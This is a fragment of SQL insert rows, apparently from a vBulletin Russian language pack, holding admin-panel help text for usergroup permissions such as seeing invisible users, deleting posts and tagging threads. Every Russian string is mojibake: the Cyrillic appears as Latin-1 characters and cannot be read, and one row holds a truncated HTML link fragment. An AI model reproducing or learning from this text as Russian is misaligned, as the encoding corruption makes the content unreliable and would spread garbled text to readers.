(24513, -1, 'usergroup_add_edit_allowmembergroups_title', 'cphelptext', 'Ãà çðåøèòü ðà ñøèðåÃèå ïðà â äîñòóïà ', 'vbulletin', '', 0, ''),
(24514, -1, 'usergroup_add_edit_isnotbannedgroup_text', 'cphelptext', 'Åñëè âû ñäåëà åòå ýòó ãðóïïó \"çà áëîêèðîâà ÃÃîé\", âà ì ñëåäóåò óñòà Ãîâèòü áîëüøèÃñòâî ïðà â äîñòóïà Ãèæå â çÃà ÷åÃèå \"Ãåò\", â çà âèñèìîñòè îòòîãî, ÷òî âû õîòèòå ïîçâîëèòü/ÃÃ¥ ïîçâîëèòü äåëà òü çà áëîêèðîâà ÃÃûì ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24515, -1, 'usergroup_add_edit_isnotbannedgroup_title', 'cphelptext', 'Ãòà ãðóïïà ÃÃ¥ ÿâëÿåòñÿ ãðóïïîé \"Çà áëîêèðîâà ÃÃûå\"', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24516, -1, 'usergroup_add_edit_ispublicgroup_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëè ìîãóò ïîñëà òü çà ÿâêó Ãà âñòóïëåÃèå â ýòó ãðóïïó èç ñâîåãî êà áèÃåòà . Òà êèå çà ÿâêè ïîñòóïà þò â î÷åðåäü â óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24517, -1, 'usergroup_add_edit_ispublicgroup_title', 'cphelptext', 'Ãóáëè÷Ãà ÿ ãðóïïà ', 'vbulletin', '', 0, ''),
(24518, -1, 'usergroup_add_edit_canoverride_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè è èñïîëüçîâà Ãèè ýòîé ãðóïïû, êà ê äîïîëÃèòåëüÃîé, áóäåò èñïîëüçîâà òüñÿ ñòà òóñ ýòîé ãðóïïû âìåñòî ñòà òóñà îñÃîâÃîé.', 'vbulletin', '', 0, ''),
(24519, -1, 'usergroup_add_edit_canoverride_title', 'cphelptext', 'Ãà çðåøåÃÃà ÿ çà ìåÃà ñòà òóñà îñÃîâÃîé ãðóïïû', 'vbulletin', '', 0, ''),
(24520, -1, 'usergroup_add_edit_canseehidden_text', 'cphelptext', 'Åñëè ïîçâîëÿþò ïðà âà , òî ïîëüçîâà òåëè ìîãóò óñòà Ãîâèòü ñåáå ðåæèì \"Ãåâèäèìûé\" è ÃÃ¥ îòîáðà æà òüñÿ â ñïèñêå ïîëüçîâà òåëåé, Ãà õîäÿùèõñÿ â äà ÃÃûé ìîìåÃò Ãà ôîðóìå. Ãòà îïöèÿ óñòà Ãà âëèâà åòñÿ â êà áèÃåòå ïîëüçîâà òåëÿ. \r\nÂêëþ÷à ÿ ýòó îïöèþ, âû ðà çðåøèòå ïîëüçîâà òåëÿì ýòîé ãðóïïû âèäåòü \"Ãåâèäèìûõ\" ïîëüçîâà òåëåé â ñïèñêå ïîëüçîâà òåëåé, Ãà õîäÿùèõñÿ â äà ÃÃûé ìîìåÃò Ãà ôîðóìå. \"Ãåâèäèìûå\" ïîëüçîâà òåëè îòìå÷à þòñÿ çâåçäî÷êîé (*) â ñïèñêå ïîëüçîâà òåëåé, Ãà õîäÿùèõñÿ â äà ÃÃûé ìîìåÃò Ãà ôîðóìå.', 'vbulletin', '', 0, ''),
(24521, -1, 'usergroup_add_edit_canseehidden_title', 'cphelptext', 'Ìîæåò âèäåòü \"Ãåâèäèìûõ\" ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24522, -1, 'usergroup_add_edit_canviewmembers_text', 'cphelptext', 'Ãòà îïöèÿ îòÃîñèòñÿ ê ïðîôèëÿì ïîëüçîâà òåëåé. Åñëè ýòà îïöèÿ âûêëþ÷åÃà , ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò ïðîñìà òðèâà òü ïðîôèëè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24523, -1, 'usergroup_add_edit_canviewmembers_title', 'cphelptext', 'Ìîæåò ñìîòðåòü èÃôîðìà öèþ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24524, -1, 'usergroup_add_edit_canmodifyprofile_text', 'cphelptext', 'Åñëè óêà çà òü \"Ãåò\", òî ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò èçìåÃèòü:\r\n\r\nïðîôèëü \r\nÃà ñòðîéêè \r\nïîäïèñü \r\nà âà òà ð \r\nôîòîãðà ôèþ \r\nêîÃôèäåÃöèà ëüÃîñòü \r\nîòîáðà æåÃèå ïðîôèëÿ \r\nó÷à ñòèå â ïóáëè÷Ãûõ ãðóïïà õ \r\n ', 'vbulletin', 'zCarot', 1231766203, '3.8.1'),
(24525, -1, 'usergroup_add_edit_canmodifyprofile_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîé ïðîôèëü', 'vbulletin', '', 0, ''),
(24526, -1, 'usergroup_add_edit_caninvisible_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò óñòà Ãîâèòü ñåáå ðåæèì \"Ãåâèäèìûé\" Ãà ñòðà Ãèöå Îïöèè â ñâî¸ì êà áèÃåòå. \"Ãåâèäèìûå\" ïîëüçîâà òåëè îòìå÷à þòñÿ çâ¸çäî÷êîé (*) â ñïèñêå ïîëüçîâà òåëåé, Ãà õîäÿùèõñÿ ñåé÷à ñ Ãà ôîðóìå (ðà çóìååòñÿ, òîëüêî ó òåõ ïîëüçîâà òåëåé, êîòîðûå ìîãóò èõ âèäåòü).', 'vbulletin', '', 0, ''),
(24527, -1, 'usergroup_add_edit_caninvisible_title', 'cphelptext', 'Ìîæåò óñòà Ãîâèòü ñåáå ðåæèì \"Ãåâèäèìûé\"', 'vbulletin', '', 0, ''),
(24528, -1, 'usergroup_add_edit_showeditedby_text', 'cphelptext', 'Âêëþ÷åÃèå ýòîé îïöèè îòîáðà çèò \"Ãåäà êòèðîâà ëîñü òà êèì-òî âî ñòîëüêî-òî\" â ñîîáùåÃèÿõ, êîòîðûå ðåäà êòèðîâà ëèñü ÷ëåÃà ìè ýòîé ãðóïïû. Ãòà îïöèÿ ðà áîòà åò ñîâìåñòÃî ñ îïöèåé \"Ãðåäåë âðåìåÃè äî îòîáðà æåÃèÿ \'Ãåäà êòèðîâà ëîñü...\'\" â îñÃîâÃûõ Ãà ñòðîéêà õ .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24529, -1, 'usergroup_add_edit_showeditedby_title', 'cphelptext', 'Ãîêà çûâà òü ïðèìå÷à Ãèå \"Ãåäà êòèðîâà ëîñü...\" â îòðåäà êòèðîâà ÃÃûõ ñîîáùåÃèÿõ', 'vbulletin', '', 0, ''),
(24530, -1, 'usergroup_add_edit_canseeraters_text', 'cphelptext', 'Ãà çðåøà åò ïîëüçîâà òåëÿì âèäåòü, êòî îñòà âëÿë êîììåÃòà ðèè, îòîáðà æà åìûå â êà áèÃåòå ïîëüçîâà òåëÿ, ïðè äîáà âëåÃèè èì ðåïóòà öèè. Ãòî òðåáóåò âêëþ÷åÃÃîé ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(24531, -1, 'usergroup_add_edit_canseeraters_title', 'cphelptext', 'Ìîæåò âèäåòü, êòî åãî îöåÃèâà ë', 'vbulletin', '', 0, ''),
(24532, -1, 'usergroup_add_edit_canjoingroups_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò âñòóïà òü â ñîöèà ëüÃûå ãðóïïû (åù¸ òðåáóåòñÿ ïðà âî \"Ìîæåò ïðîñìà òðèâà òü ñîöèà ëüÃûå ãðóïïû\").', 'vbulletin', 'zCarot', 1195740034, '3.7.0 Beta 1'),
(24533, -1, 'usergroup_add_edit_canjoingroups_title', 'cphelptext', 'Ìîæåò âñòóïà òü â ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195740034, '3.7.0 Beta 1'),
(24534, -1, 'usergroup_add_edit_canusecustomtitle_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò ïðèñâîèòü ñåáå ïðîèçâîëüÃûé ñòà òóñ Ãà ñòðà Ãèöå Ãåäà êòèðîâà òü ïðîôèëü â êà áèÃåòå ïîëüçîâà òåëÿ. Ñòà òóñ îòîáðà æà åòñÿ â ñîîáùåÃèÿõ ïîëüçîâà òåëÿ è â ïðîôèëå âìåñòî ëþáîãî ñòà òóñà , óêà çà ÃÃîãî äëÿ åãî ãðóïïû èëè îïðåäåëÿþùåãîñÿ ïî êîëè÷åñòâó ñîîáùåÃèé (ñì. Óïðà âëåÃèå ñòà òóñà ìè ).', 'vbulletin', '', 0, ''),
(24535, -1, 'usergroup_add_edit_canusecustomtitle_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ñâîé ñòà òóñ', 'vbulletin', '', 0, ''),
(24536, -1, 'usergroup_add_edit_canusesignature_text', 'cphelptext', 'Ãîäïèñü îòîáðà æà åòñÿ â êîÃöå êà æäîãî ñîîáùåÃèÿ ïîëüçîâà òåëÿ. Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ïîëüçîâà òåëè äà ÃÃîé ãðóïïû ñìîãóò óñòà Ãà âëèâà òü ñâîþ ïîäïèñü ñ ïîìîùüþ ñòðà Ãèöû Ãåäà êòèðîâà òü ïîäïèñü â ñâî¸ì êà áèÃåòå.', 'vbulletin', 'zCarot', 1152729976, '3.6.0 Release Candidate 2'),
(24537, -1, 'usergroup_add_edit_canusesignature_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ïîäïèñü', 'vbulletin', '', 0, ''),
(24538, -1, 'usergroup_add_edit_canseeprofilepic_text', 'cphelptext', 'Ôîòîãðà ôèÿ ïîëüçîâà òåëÿ îòîáðà æà åòñÿ Ãà ñòðà Ãèöå åãî ïðîôèëÿ. Ôîòîãðà ôèè ÃóæÃû, ñîáñòâåÃÃî, äëÿ òîãî, ÷òîáû çÃà òü, êà ê âûãëÿäèò ïîëüçîâà òåëü Ãà ñà ìîì äåëå. Ãòà îïöèÿ îïðåäåëÿåò, ìîãóò èëè Ãåò ïîëüçîâà òåëè ýòîé ãðóïïû ñìîòðåòü ôîòîãðà ôèè äðóãèõ.', 'vbulletin', '', 0, ''),
(24539, -1, 'usergroup_add_edit_canseeprofilepic_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ôîòîãðà ôèè äðóãèõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24540, -1, 'usergroup_add_edit_canseehiddencustomfields_text', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì ïðîñìà òðèâà òü èÃôîðìà öèþ â äîïîëÃèòåëüÃûõ ïîëÿõ ïðîôèëÿ, êîòîðûå îòìå÷åÃû êà ê ëè÷Ãûå.', 'vbulletin', '', 0, ''),
(24541, -1, 'usergroup_add_edit_canseehiddencustomfields_title', 'cphelptext', 'Ìîæåò âèäåòü ëè÷Ãûå ïîëÿ ïðîôèëÿ', 'vbulletin', '', 0, ''),
(24542, -1, 'usergroup_add_edit_canview_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå îïðåäåëÿåò, ìîæåò èëè Ãåò ïîëüçîâà òåëü èç ýòîé ãðóïïû ïðîñìà òðèâà òü ñòðà Ãèöû ôîðóìà . Åñëè âû ïîñòà âèòå çÃà ÷åÃèå \"Ãåò\", òî ïîëüçîâà òåëè ýòîé ãðóïïû áóäóò âèäåòü ñòðà Ãèöó \"Ãåò äîñòóïà \" ïðè ïîïûòêà õ ïðîñìîòðà âñåõ ñòðà Ãèö âà øåãî ôîðóìà . Îáû÷Ãî ýòà îïöèÿ èñïîëüçóåòñÿ äëÿ îãðà Ãè÷åÃèÿ äîñòóïà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24543, -1, 'usergroup_add_edit_canview_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü ðà çäåë', 'vbulletin', '', 0, ''),
(24544, -1, 'usergroup_add_edit_canviewothers_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûêëþ÷åÃà , òî ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò âèäåòü òîëüêî ñâîè òåìû â ñïèñêå òåì ðà çäåëà . Òåìû, êîòîðûå ñîçäà Ãû ÃÃ¥ èìè, ÃÃ¥ áóäóò îòîáðà æà òüñÿ.', 'vbulletin', '', 0, ''),
(24545, -1, 'usergroup_add_edit_canviewothers_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü ÷óæèå òåìû', 'vbulletin', '', 0, ''),
(24546, -1, 'usergroup_add_edit_canseedelnotice_text', 'cphelptext', 'Êîãäà à äìèÃèñòðà òîð èëè ìîäåðà òîð óäà ëÿåò òåìó, îÃè âûáèðà þò îïöèþ \"Ìÿãêîå óäà ëåÃèå\" èëè \"ÃîëÃîå ôèçè÷åñêîå óäà ëåÃèå\". Åñëè òåìà óäà ëåÃà \"ìÿãêî\", òî Ãà ¸¸ ìåñòå â ñïèñêå òåì ðà çäåëà îñòà ¸òñÿ óâåäîìëåÃèå î å¸ óäà ëåÃèè. Ãòî ðà çðåøåÃèå îïðåäåëÿåò, ìîæåò èëè Ãåò ïîëüçîâà òåëü èç ýòîé ãðóïïû âèäåòü òà êèå óâåäîìëåÃèÿ.', 'vbulletin', '', 0, ''),
(24547, -1, 'usergroup_add_edit_canseedelnotice_title', 'cphelptext', 'Ìîæåò âèäåòü óâåäîìëåÃèÿ îá óäà ëåÃèè', 'vbulletin', '', 0, ''),
(24548, -1, 'usergroup_add_edit_cansearch_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû èñêà òü ðà çäåëû. Äëÿ óñïåøÃîé ðà áîòû ýòîãî ðà çðåøåÃèÿ âà ì ÃóæÃî âêëþ÷èòü ïîèñê ïî ôîðóìó â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24549, -1, 'usergroup_add_edit_cansearch_title', 'cphelptext', 'Ìîæåò èñêà òü ðà çäåëû', 'vbulletin', '', 0, ''),
(24550, -1, 'usergroup_add_edit_canemail_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå îòêðûâà åò äîñòóï ê ññûëêå \"Îòïðà âèòü ïî ýëåêòðîÃÃîé ïî÷òå\" Ãà ñòðà Ãèöà õ ôîðóìà . Ãòà ôóÃêöèÿ ïîçâîëÿåò ïîëüçîâà òåëÿì ýòîé ãðóïïû îòïðà âëÿòü ýëåêòðîÃÃûå ïèñüìà ñî ññûëêîé Ãà òåìó. Åñëè âû ÃÃ¥ ðà çðåøà åòå ãîñòÿì ïðîñìà òðèâà òü òåìû, òî ýòó ôóÃêöèþ ëó÷øå âûêëþ÷èòü.', 'vbulletin', '', 0, ''),
(24551, -1, 'usergroup_add_edit_canemail_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ôóÃêöèþ \"ÃëåêòðîÃÃîå ïèñüìî äðóãó\"', 'vbulletin', '', 0, ''),
(24552, -1, 'usergroup_add_edit_cangetattachment_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ñêà ÷èâà òü/ïðîñìà òðèâà òü âëîæåÃèÿ. Åñëè ó ïîëüçîâà òåëÿ Ãåò ðà çðåøåÃèÿ ïðîñìà òðèâà òü âëîæåÃèÿ, òî âñòðîåÃÃûå èçîáðà æåÃèÿ áóäóò îòîáðà æà òüñÿ êà ê ññûëêè, ïðè ïåðåõîäå ïî êîòîðûì áóäåò îòîáðà æà òüñÿ ñòðà Ãèöà \"Ãåò äîñòóïà \".', 'vbulletin', '', 0, ''),
(24553, -1, 'usergroup_add_edit_cangetattachment_title', 'cphelptext', 'Ìîæåò ñêà ÷èâà òü âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(24554, -1, 'usergroup_add_edit_canpostnew_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äîâîëüÃî î÷åâèäÃî. Åñëè ïîëüçîâà òåëü ÃÃ¥ èìååò Ãà ýòî ïðà â, òî îà ÃÃ¥ ñìîæåò ñîçäà òü Ãîâóþ òåìó.', 'vbulletin', '', 0, ''),
(24555, -1, 'usergroup_add_edit_canpostnew_title', 'cphelptext', 'Ìîæåò ñîçäà âà òü òåìû', 'vbulletin', '', 0, ''),
(24556, -1, 'usergroup_add_edit_canreplyown_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû îòâå÷à òü â ñâîèõ òåìà õ. Åñëè ïî êà êèì-ëèáî ïðè÷èÃà ì âû ÃÃ¥ æåëà åòå, ÷òîáû à âòîðû òåìû âûñêà çûâà ëèñü â Ãåé, âûêëþ÷èòå ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(24557, -1, 'usergroup_add_edit_canreplyown_title', 'cphelptext', 'Ìîæåò îòâå÷à òü â ñâîèõ òåìà õ', 'vbulletin', '', 0, ''),
(24558, -1, 'usergroup_add_edit_canreplyothers_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå ïîäîáÃî ðà çðåøåÃèþ \"Ìîæåò îòâå÷à òü â ñâîèõ òåìà õ\" . Îòëè÷èå òîëüêî â òîì, ÷òî ïðåäîñòà âëÿåòñÿ âîçìîæÃîñòü îòâå÷à òü ÃÃ¥ â ñâîèõ òåìà õ, à â òåìà õ, ñîçäà ÃÃûõ äðóãèìè ïîëüçîâà òåëÿìè.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24559, -1, 'usergroup_add_edit_canreplyothers_title', 'cphelptext', 'Ìîæåò îòâå÷à òü â ÷óæèõ òåìà õ', 'vbulletin', '', 0, ''),
(24560, -1, 'usergroup_add_edit_caneditpost_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ. Ãòî ðà çðåøåÃèå ðà áîòà åò âìåñòå ñ îïöèåé \"Ñðîê ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé\" îñÃîâÃûõ Ãà ñòðîåê .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24561, -1, 'usergroup_add_edit_caneditpost_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(24562, -1, 'usergroup_add_edit_candeletepost_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû óäà ëÿòü ñâîè ñîáñòâåÃÃûå ñîîáùåÃèÿ. Ãòà ãðóïïà òà êæå äîëæÃà èìåòü ïðà âî ðåäà êòèðîâà òü ñîîáùåÃèÿ (ñì. ïðåäûäóùåå ðà çðåøåÃèå). \r\nÃóäüòå îñòîðîæÃû ñ ðà çðåøåÃèåì óäà ëåÃèÿ ñîîáùåÃèé. Åñëè âû ïîçâîëèòå ïîëüçîâà òåëÿì ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ áåñêîÃå÷Ãî ïî âðåìåÃè (ñì. îïöèþ \"Ñðîê ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé\" çäåñü ), òî âû òà êæå ïîçâîëèòå èì óäà ëÿòü ñâîè ñîîáùåÃèÿ â ëþáîå âðåìÿ, ò.Ã¥. îÃè âñåãäà ñìîãóò ïîñìîòðåòü è óäà ëèòü âñå ñâîè ñîîáùåÃèÿ, åñëè, êîÃå÷Ãî, çà õîòÿò.\r\n\r\nÃîìÃèòå: ïîëüçîâà òåëè ìîãóò òîëüêî \"ìÿãêî\" óäà ëÿòü ñâîè ñîîáùåÃèÿ. Òî åñòü âû ñìîæåòå âîññòà Ãîâèòü èõ â ëþáîå âðåìÿ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24563, -1, 'usergroup_add_edit_candeletepost_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(24564, -1, 'usergroup_add_edit_canmove_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò ïåðåìåùà òü ñâîè òåìû â äðóãèå ðà çäåëû ñ ïîìîùüþ ôóÃêöèè \"Ãåðåìåñòèòü/ñêîïèðîâà òü òåìó\" â ìåÃþ \"Îïöèè òåìû\".', 'vbulletin', '', 0, ''),
(24565, -1, 'usergroup_add_edit_canmove_title', 'cphelptext', 'Ìîæåò ïåðåìåùà òü ñâîè òåìû', 'vbulletin', '', 0, ''),
(24566, -1, 'usergroup_add_edit_canopenclose_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò îòêðûâà òü/çà êðûâà òü ñâîè òåìû ñ ïîìîùüþ îïöèè \"Îòêðûòü/çà êðûòü òåìó\" â ìåÃþ \"Îïöèè òåìû\". \r\n îòêðûòîé òåìå ìîæÃî îñòà âëÿòü ñîîáùåÃèÿ, â çà êðûòîé - Ãåëüçÿ (ýòî ÃÃ¥ êà ñà åòñÿ à äìèÃèñòðà òîðîâ è ìîäåðà òîðîâ).', 'vbulletin', '', 0, ''),
(24567, -1, 'usergroup_add_edit_canopenclose_title', 'cphelptext', 'Ìîæåò îòêðûâà òü/çà êðûâà òü ñâîè òåìû', 'vbulletin', '', 0, ''),
(24568, -1, 'usergroup_add_edit_candeletethread_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû óäà ëÿòü ñâîè ñîáñòâåÃÃûå òåìû. Ãòà ãðóïïà òà êæå äîëæÃà èìåòü ïðà âî ðåäà êòèðîâà òü ñîîáùåÃèÿ (ñì. ðà çðåøåÃèå \"Ìîæåò ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ\"), åñëè îÃè æåëà þò óäà ëèòü òåìó. Ãòî ðà çðåøåÃèå ïîçâîëÿåò óäà ëÿòü òåìû ïîñðåäñòâîì ðåäà êòèðîâà Ãèÿ ïåðâîãî ñîîáùåÃèÿ â òåìå (ïîÿâèòñÿ ôîðìà äëÿ âûáîðà óäà ëåÃèÿ òåìû ñ óêà çà Ãèåì ïðè÷èÃû óäà ëåÃèÿ), à ÃÃ¥ ñ ïîìîùüþ âûáîðà îïöèè \"Óäà ëèòü òåìó\" èç ìåÃþ \"Óïðà âëåÃèå òåìà ìè\". \r\nÃóäüòå îñòîðîæÃû ñ ðà çðåøåÃèåì óäà ëåÃèÿ òåì. Ãðè óäà ëåÃèè òåìû óÃè÷òîæà þòñÿ âñå ñîîáùåÃèÿ, Ãà õîäÿùèåñÿ â Ãåé. Åñëè âû ïîçâîëèòå ïîëüçîâà òåëÿì ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ áåñêîÃå÷Ãî ïî âðåìåÃè (ñì. îïöèþ \"Ñðîê ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé\" çäåñü ), òî âû òà êæå ïîçâîëèòå èì óäà ëÿòü ñâîè òåìû â ëþáîå âðåìÿ, ò.Ã¥. îÃè âñåãäà ñìîãóò ïîñìîòðåòü è óäà ëèòü âñå ñâîè òåìû, åñëè, êîÃå÷Ãî, çà õîòÿò.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24569, -1, 'usergroup_add_edit_candeletethread_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè òåìû', 'vbulletin', '', 0, ''),
(24570, -1, 'usergroup_add_edit_followforummoderation_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî âñå ñîîáùåÃèÿ, ñîçäà âà åìûå ïîëüçîâà òåëÿìè ýòîé ãðóïïû, áóäóò îòïðà âëåÃû â config[Misc][modcpdir]}/moderate.php?do=posts\" target=\"_blank\">î÷åðåäü ïðîâåðêè . Âà ì ÃóæÃî áóäåò ïîäòâåðäèòü ñîîáùåÃèÿ, äî òîãî êà ê îÃè áóäóò îòîáðà æà òüñÿ Ãà ôîðóìå.', 'vbulletin', '', 0, ''),
(24571, -1, 'usergroup_add_edit_followforummoderation_title', 'cphelptext', 'Ãîâûå ñîîáùåÃèÿ ÃÃ¥ ïðîâåðÿþòñÿ', 'vbulletin', '', 0, ''),
(24572, -1, 'usergroup_add_edit_cantagown_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïðèñâà èâà òü ìåòêè ñâîèì òåìà ì', 'vbulletin', 'zCarot', 1195733271, '3.7.0 Beta 1'),
(24573, -1, 'usergroup_add_edit_cantagown_title', 'cphelptext', 'Ìîæåò ïðèñâà èâà òü ìåòêè ñâîèì òåìà ì', 'vbulletin', 'zCarot', 1195733271, '3.7.0 Beta 1'),
(24574, -1, 'usergroup_add_edit_picturefollowforummoderation_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî âñå èçîáðà æåÃèÿ, çà ãðóæåÃÃûå ïîëüçîâà òåëÿìè ýòîé ãðóïïû, áóäóò îòïðà âëåÃû Ãà ïðîâåðêó . Âà ì ïîòðåáóåòñÿ îäîáðèòü èõ èçîáðà æåÃèÿ, ïðåæäå ÷åì îÃè áóäóò îòîáðà æåÃû â èõ à ëüáîìà õ.', 'vbulletin', 'zCarot', 1208787129, '3.7.0 Release Candidate 4'),
(24575, -1, 'usergroup_add_edit_picturefollowforummoderation_title', 'cphelptext', 'Ñëåäîâà òü ïðà âèëà ì ïðîâåðêè èçîáðà æåÃèé', 'vbulletin', 'zCarot', 1203546867, '3.7.0 Beta 6'),
(24576, -1, 'usergroup_add_edit_cantagothers_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïðèñâà èâà òü ìåòêè ê ÷óæèì òåìà ì', 'vbulletin', 'zCarot', 1195733408, '3.7.0 Beta 1'),
(24577, -1, 'usergroup_add_edit_cantagothers_title', 'cphelptext', 'Ìîæåò ïðèñâà èâà òü ìåòêè ÷óæèì òåìà ì', 'vbulletin', 'zCarot', 1195733408, '3.7.0 Beta 1'),
(24578, -1, 'usergroup_add_edit_commentfollowforummoderation_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî âñå êîììåÃòà ðèè ê èçîáðà æåÃèÿì, îñòà âëåÃÃûå ïîëüçîâà òåëÿìè ýòîé ãðóïïû, áóäóò îòïðà âëåÃû Ãà ïðîâåðêó . Âà ì ïîòðåáóåòñÿ îäîáðèòü èõ êîììåÃòà ðèè ê èçîáðà æåÃèÿì, ïðåæäå ÷åì îÃè áóäóò îòîáðà æåÃû.', 'vbulletin', 'zCarot', 1208787108, '3.7.0 Release Candidate 4'),
(24579, -1, 'usergroup_add_edit_commentfollowforummoderation_title', 'cphelptext', 'Ñëåäîâà òü ïðà âèëà ì ïðîâåðêè êîììåÃòà ðèåâ ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1203546910, '3.7.0 Beta 6'),
(24580, -1, 'usergroup_add_edit_candeletetagown_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò óäà ëÿòü ìåòêè ñâîèõ òåì', 'vbulletin', 'zCarot', 1195733535, '3.7.0 Beta 1'),
(24581, -1, 'usergroup_add_edit_candeletetagown_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ìåòêè â ñâîèõ òåìà õ', 'vbulletin', 'zCarot', 1195733535, '3.7.0 Beta 1'),
(24582, -1, 'usergroup_add_edit_cancreatetag_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ñîçäà âà òü ñâîè ìåòêè.  ïðîòèâÃîì ñëó÷à å ïðèä¸òñÿ âûáèðà òü èç óæå ñóùåñòâóþùèõ Ãà ôîðóìå.\r\n \r\n \r\n Ìîæåò îöåÃèâà òü òåìû \r\n \r\nÎöåÃêà òåì òà êæå äîëæÃà áûòü âêëþ÷åÃà â ôîðóìå, ÷òîáû ýòà ãðóïïà ñìîãëà îöåÃèâà òü èõ. Âûáåðèòå îïöèþ \"Ãåäà êòèðîâà òü ðà çäåë\" â óïðà âëåÃèè ðà çäåëà ìè , ÷òîáû Ãà ñòðîèòü ýòó îïöèþ. ÄîïîëÃèòåëüÃî ñóùåñòâóþò Ãåñêîëüêî îïöèé, êà ñà þùèõñÿ îöåÃêè òåì â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà .', 'vbulletin', 'zCarot', 1195733584, '3.7.0 Beta 1'),
(24583, -1, 'usergroup_add_edit_cancreatetag_title', 'cphelptext', 'Ìîæåò ñîçäà âà òü ìåòêè', 'vbulletin', 'zCarot', 1195733584, '3.7.0 Beta 1'),
